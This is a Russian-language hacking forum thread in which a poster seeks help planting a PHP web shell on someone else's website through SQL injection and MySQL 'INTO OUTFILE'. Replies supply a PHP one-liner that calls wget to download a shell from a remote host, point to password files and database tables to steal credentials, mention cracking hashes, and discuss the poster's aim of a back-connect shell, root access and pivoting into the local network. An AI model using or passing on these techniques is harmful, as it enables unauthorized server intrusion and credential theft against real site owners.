Помогите залить шелл
 

Есть проблема заливки шелла на один сайт.
Краткая предистрия....
Есть доступ к mysql от туда можно командой " 'SELECT 'злой пхп шелл' FROM таблица WHERE id=строка
into outfile 'путь к файлу' " загрузить данные с таблици в файл скажем /USR/LOCAL/путь где лежит наш сайт/myevilshell.php

и собственно сама проблема: Я нигде немогу узнать полный путь к директории сайта....

Опытные и знающие люди подскажите помогите что делать.


P.S.- подгрузить файл httpd.conf в таблицу мускула из апача прав нехватило

а там есть какие нить форумы или чаты, можно попробовать через них раскрыть полный путь

попробуй поискать какие либо баги. все намного было бы легче если была бы не слепая скуль..

Тебе нужно найти только багу а то ничего не сможешь сделать

Форумов и чатов там нет.
а багу нашел только одну

Warning: require(DB.php) [function.require]: failed to open stream: No such file or directory in /home/http/htdocs/library/includes/config.php on line 2

Fatal error: require() [function.require]: Failed opening required 'DB.php' (include_path='.:/usr/local/include/php/include/libs') in /home/http/htdocs/library/includes/config.php on line 2

может кто скажет чем мне это сможет помочь...??

Попробуй загрузи в /home/http/htdocs/library/includes/ авось прокатит.

Ну или в /home/http/htdocs/ или в /home/http/htdocs/library/ .

имхо /home/http/htdocs/ ..

Метод научного тыка... перепробовал.... заливал куда мог.... но всеравно не судьба. Может кто знает какойнить скульный запрос который покажет где путь лежит PhpMyadmin ???
тогда можно просто залить в дир майадмина...

Помогите... выложите пожалуйста ПХП скрипт который делает wget
ато уже сил нет пререписывать символы в шеле чтоб его мускул прохавал нормально....

<?system("wget http://site.com/shell.php");?>

))

Спасибки...

А, как что б загрул в другую директорию... ???

<?system("wget http://site.com/shell.php -O /директори/название_файла.php");?>

Загрузи и скопируй

Подскажите кто знает где хранятся пароли на phpmyadmin если auth_type http

config.inc.php

Какие файлы нужно просмотреть во FreeBSD для того что б увидеть пароли...
etc/passwd пароли закрыты звездочкой ????

/etc/master.passwd . Но и там они не в открытом виде :)

Lya--Lya, для рассшифровки юзай Join The Ripper

/etc/master.passwd грузить в таблицу не хочет... говорит что нет такого файла...
Может еще чегото есть где могут быть пароли...???

Что это и где такое взять ?

ребят.... я зашел в тупик... немогу доломать сайт кто может помочь просьба писать в аску 22554264.....
соррри что не в форуме просто не хочится калечить сайт цель совешенно другая....
Хочется организовать bacconnect с сервака, получить рут, поднять на фрихе впн и прорваться в локалку....

Кста... если не тяжело расскажите как правильно организовать бэкконнект... ато как то чувствую себя ламером

скорее всего и прав на запись не хватит тогда

если тип http то пароли могут(могут только а могут и нетолько ) хранится только в бд, а не в конфигах phpmyadmin, еслиб был тип config то в конфиге
P.S. единственное что можешь попробовать это если прав хватит на mysql.user узнать пароли от mysql и попробовать их на другие сервисы, хотя канечно некоторые могут одинаковые пароли иметь и на админку форума и на ftp но это эксклюзив.
PP.S хотя все это уже обжёвывалось раньше , надо наверно antichat в книгах выпускать :)

читать его может только root

сомневаюсь, что у тебя получится поднять рут на фряхе :)

тем более
нужен рут + хорошее знание ОС

лучше ssh тунель, для него и рут не обязателен )


вообщем для начала получи хотя бы веб шелл

Где лежит этот файл????